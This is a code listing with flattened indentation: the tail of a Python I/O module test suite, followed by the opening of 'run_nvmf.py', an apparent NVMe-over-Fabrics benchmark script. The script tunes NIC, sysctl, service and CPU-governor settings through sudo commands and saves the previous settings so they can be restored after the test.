decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
run_nvmf.py
|
#!/usr/bin/env python3
import os
import re
import sys
import json
import zipfile
import threading
import subprocess
import itertools
import configparser
import time
import uuid
from collections import OrderedDict
import paramiko
import pandas as pd
import rpc
import rpc.client
from common import *
class Server:
def __init__(self, name, general_config, server_config):
self.name = name
self.username = general_config["username"]
self.password = general_config["password"]
self.transport = general_config["transport"].lower()
self.nic_ips = server_config["nic_ips"]
self.mode = server_config["mode"]
self.irq_scripts_dir = "/usr/src/local/mlnx-tools/ofed_scripts"
if "irq_scripts_dir" in server_config and server_config["irq_scripts_dir"]:
self.irq_scripts_dir = server_config["irq_scripts_dir"]
self.local_nic_info = []
self._nics_json_obj = {}
self.svc_restore_dict = {}
self.sysctl_restore_dict = {}
self.tuned_restore_dict = {}
self.governor_restore = ""
self.tuned_profile = ""
self.enable_adq = False
self.adq_priority = None
if "adq_enable" in server_config and server_config["adq_enable"]:
self.enable_adq = server_config["adq_enable"]
self.adq_priority = 1
if "tuned_profile" in server_config:
self.tuned_profile = server_config["tuned_profile"]
if not re.match("^[A-Za-z0-9]*$", name):
self.log_print("Please use a name which contains only letters or numbers")
sys.exit(1)
def log_print(self, msg):
print("[%s] %s" % (self.name, msg), flush=True)
def get_uncommented_lines(self, lines):
return [line for line in lines if line and not line.startswith('#')]
def get_nic_name_by_ip(self, ip):
if not self._nics_json_obj:
nics_json_obj = self.exec_cmd(["ip", "-j", "address", "show"])
self._nics_json_obj = list(filter(lambda x: x["addr_info"], json.loads(nics_json_obj)))
for nic in self._nics_json_obj:
for addr in nic["addr_info"]:
if ip in addr["local"]:
return nic["ifname"]
def set_local_nic_info_helper(self):
pass
def set_local_nic_info(self, pci_info):
def extract_network_elements(json_obj):
nic_list = []
if isinstance(json_obj, list):
for x in json_obj:
nic_list.extend(extract_network_elements(x))
elif isinstance(json_obj, dict):
if "children" in json_obj:
nic_list.extend(extract_network_elements(json_obj["children"]))
if "class" in json_obj.keys() and "network" in json_obj["class"]:
nic_list.append(json_obj)
return nic_list
self.local_nic_info = extract_network_elements(pci_info)
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
return ""
def configure_system(self):
self.configure_services()
self.configure_sysctl()
self.configure_tuned()
self.configure_cpu_governor()
self.configure_irq_affinity()
def configure_adq(self):
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
self.adq_load_modules()
self.adq_configure_nic()
def adq_load_modules(self):
self.log_print("Modprobing ADQ-related Linux modules...")
adq_module_deps = ["sch_mqprio", "act_mirred", "cls_flower"]
for module in adq_module_deps:
try:
self.exec_cmd(["sudo", "modprobe", module])
self.log_print("%s loaded!" % module)
except CalledProcessError as e:
self.log_print("ERROR: failed to load module %s" % module)
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
def adq_configure_tc(self):
self.log_print("Configuring ADQ Traffic classess and filters...")
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
num_queues_tc0 = 2 # 2 is minimum number of queues for TC0
num_queues_tc1 = self.num_cores
port_param = "dst_port" if isinstance(self, Target) else "src_port"
ports = set([p[0] for p in self.subsystem_info_list])
xps_script_path = os.path.join(self.spdk_dir, "scripts", "perf", "nvmf", "set_xps_rxqs")
for nic_ip in self.nic_ips:
nic_name = self.get_nic_name_by_ip(nic_ip)
tc_qdisc_map_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name,
"root", "mqprio", "num_tc", "2", "map", "0", "1",
"queues", "%s@0" % num_queues_tc0,
"%s@%s" % (num_queues_tc1, num_queues_tc0),
"hw", "1", "mode", "channel"]
self.log_print(" ".join(tc_qdisc_map_cmd))
self.exec_cmd(tc_qdisc_map_cmd)
tc_qdisc_ingress_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name, "ingress"]
self.log_print(" ".join(tc_qdisc_ingress_cmd))
self.exec_cmd(tc_qdisc_ingress_cmd)
for port in ports:
tc_filter_cmd = ["sudo", "tc", "filter", "add", "dev", nic_name,
"protocol", "ip", "ingress", "prio", "1", "flower",
"dst_ip", "%s/32" % nic_ip, "ip_proto", "tcp", port_param, port,
"skip_sw", "hw_tc", "1"]
self.log_print(" ".join(tc_filter_cmd))
self.exec_cmd(tc_filter_cmd)
# Ethtool coalese settings must be applied after configuring traffic classes
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-rx", "off", "rx-usecs", "0"])
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-tx", "off", "tx-usecs", "500"])
self.log_print("Running set_xps_rxqs script for %s NIC..." % nic_name)
xps_cmd = ["sudo", xps_script_path, nic_name]
self.log_print(xps_cmd)
self.exec_cmd(xps_cmd)
def adq_configure_nic(self):
self.log_print("Configuring NIC port settings for ADQ testing...")
# Reload the driver first, to make sure any previous settings are re-set.
try:
self.exec_cmd(["sudo", "rmmod", "ice"])
self.exec_cmd(["sudo", "modprobe", "ice"])
except CalledProcessError as e:
self.log_print("ERROR: failed to reload ice module!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
self.log_print(nic)
try:
self.exec_cmd(["sudo", "ethtool", "-K", nic,
"hw-tc-offload", "on"]) # Enable hardware TC offload
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-inline-flow-director", "on"]) # Enable Intel Flow Director
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic, "fw-lldp-agent", "off"]) # Disable LLDP
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-pkt-inspect-optimize", "off"]) # Disable channel packet inspection optimization
except CalledProcessError as e:
self.log_print("ERROR: failed to configure NIC port using ethtool!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
self.log_print("Please update your NIC driver and firmware versions and try again.")
self.log_print(self.exec_cmd(["sudo", "ethtool", "-k", nic]))
self.log_print(self.exec_cmd(["sudo", "ethtool", "--show-priv-flags", nic]))
def configure_services(self):
self.log_print("Configuring active services...")
svc_config = configparser.ConfigParser(strict=False)
# Below list is valid only for RHEL / Fedora systems and might not
# contain valid names for other distributions.
svc_target_state = {
"firewalld": "inactive",
"irqbalance": "inactive",
"lldpad.service": "inactive",
"lldpad.socket": "inactive"
}
for service in svc_target_state:
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
svc_config.read_string(out)
if "LoadError" in svc_config[service] and "not found" in svc_config[service]["LoadError"]:
continue
service_state = svc_config[service]["ActiveState"]
self.log_print("Current state of %s service is %s" % (service, service_state))
self.svc_restore_dict.update({service: service_state})
if service_state != "inactive":
self.log_print("Disabling %s. It will be restored after the test has finished." % service)
self.exec_cmd(["sudo", "systemctl", "stop", service])
def configure_sysctl(self):
self.log_print("Tuning sysctl settings...")
busy_read = 0
if self.enable_adq and self.mode == "spdk":
busy_read = 1
sysctl_opts = {
"net.core.busy_poll": 0,
"net.core.busy_read": busy_read,
"net.core.somaxconn": 4096,
"net.core.netdev_max_backlog": 8192,
"net.ipv4.tcp_max_syn_backlog": 16384,
"net.core.rmem_max": 268435456,
"net.core.wmem_max": 268435456,
"net.ipv4.tcp_mem": "268435456 268435456 268435456",
"net.ipv4.tcp_rmem": "8192 1048576 33554432",
"net.ipv4.tcp_wmem": "8192 1048576 33554432",
"net.ipv4.route.flush": 1,
"vm.overcommit_memory": 1,
}
for opt, value in sysctl_opts.items():
self.sysctl_restore_dict.update({opt: self.exec_cmd(["sysctl", "-n", opt]).strip()})
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def configure_tuned(self):
if not self.tuned_profile:
self.log_print("WARNING: Tuned profile not set in configration file. Skipping configuration.")
return
self.log_print("Configuring tuned-adm profile to %s." % self.tuned_profile)
service = "tuned"
tuned_config = configparser.ConfigParser(strict=False)
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
tuned_config.read_string(out)
tuned_state = tuned_config[service]["ActiveState"]
self.svc_restore_dict.update({service: tuned_state})
if tuned_state != "inactive":
profile = self.exec_cmd(["cat", "/etc/tuned/active_profile"]).strip()
profile_mode = self.exec_cmd(["cat", "/etc/tuned/profile_mode"]).strip()
self.tuned_restore_dict = {
"profile": profile,
"mode": profile_mode
}
self.exec_cmd(["sudo", "systemctl", "start", service])
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_profile])
self.log_print("Tuned profile set to %s." % self.exec_cmd(["cat", "/etc/tuned/active_profile"]))
def configure_cpu_governor(self):
self.log_print("Setting CPU governor to performance...")
# This assumes that there is the same CPU scaling governor on each CPU
self.governor_restore = self.exec_cmd(["cat", "/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor"]).strip()
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "performance"])
def configure_irq_affinity(self):
self.log_print("Setting NIC irq affinity for NICs...")
irq_script_path = os.path.join(self.irq_scripts_dir, "set_irq_affinity.sh")
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
irq_cmd = ["sudo", irq_script_path, nic]
self.log_print(irq_cmd)
self.exec_cmd(irq_cmd, change_dir=self.irq_scripts_dir)
def restore_services(self):
self.log_print("Restoring services...")
for service, state in self.svc_restore_dict.items():
cmd = "stop" if state == "inactive" else "start"
self.exec_cmd(["sudo", "systemctl", cmd, service])
def restore_sysctl(self):
self.log_print("Restoring sysctl settings...")
for opt, value in self.sysctl_restore_dict.items():
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def restore_tuned(self):
self.log_print("Restoring tuned-adm settings...")
if not self.tuned_restore_dict:
return
if self.tuned_restore_dict["mode"] == "auto":
self.exec_cmd(["sudo", "tuned-adm", "auto_profile"])
self.log_print("Reverted tuned-adm to auto_profile.")
